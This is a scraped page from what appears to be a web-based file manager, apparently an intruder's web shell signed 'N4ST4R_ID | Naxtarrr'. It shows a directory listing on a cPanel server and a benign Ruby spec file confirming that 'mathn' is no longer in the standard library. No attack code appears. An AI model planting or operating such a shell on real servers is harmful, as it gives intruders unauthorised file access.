Submit
Path:
~
/
/
opt
/
cpanel
/
ea-ruby27
/
root
/
usr
/
lib64
/
ruby
/
ruby-2.7.8
/
mathn
/
File Content:
mathn_spec.rb
require_relative '../../spec_helper' describe "mathn" do ruby_version_is "2.5" do it "is no longer part of the standard library" do -> { require "mathn" }.should raise_error(LoadError) { |e| e.path.should == 'mathn' } end end end
Submit
FILE
FOLDER
Name
Size
Permission
Action
bignum
---
0755
complex
---
0755
fixnum
---
0755
float
---
0755
integer
---
0755
math
---
0755
rational
---
0755
mathn_spec.rb
277 bytes
0644
rational.so
6968 bytes
0755
N4ST4R_ID | Naxtarrr